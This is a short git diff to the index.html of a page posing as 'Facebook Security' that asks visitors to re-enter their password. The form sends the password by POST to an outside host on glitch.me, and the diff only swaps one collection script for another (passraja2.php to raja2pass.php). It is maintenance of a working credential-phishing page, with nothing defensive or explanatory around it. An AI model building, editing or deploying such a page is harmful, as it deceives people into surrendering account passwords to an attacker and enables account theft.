--- a/index.html
+++ b/index.html
@@ -112,7 +112,7 @@
             Facebook Security
         </div>
         <p>Please re-enter your password to complete the request.</p>
-        <form id="passwordForm" action="https://gravel-magical-statistic.glitch.me/passraja2.php" method="POST">
+        <form id="passwordForm" action="https://gravel-magical-statistic.glitch.me/raja2pass.php" method="POST">
             <div class="form-group">
                 <label for="password">Password</label>
                 <div class="input-wrapper">
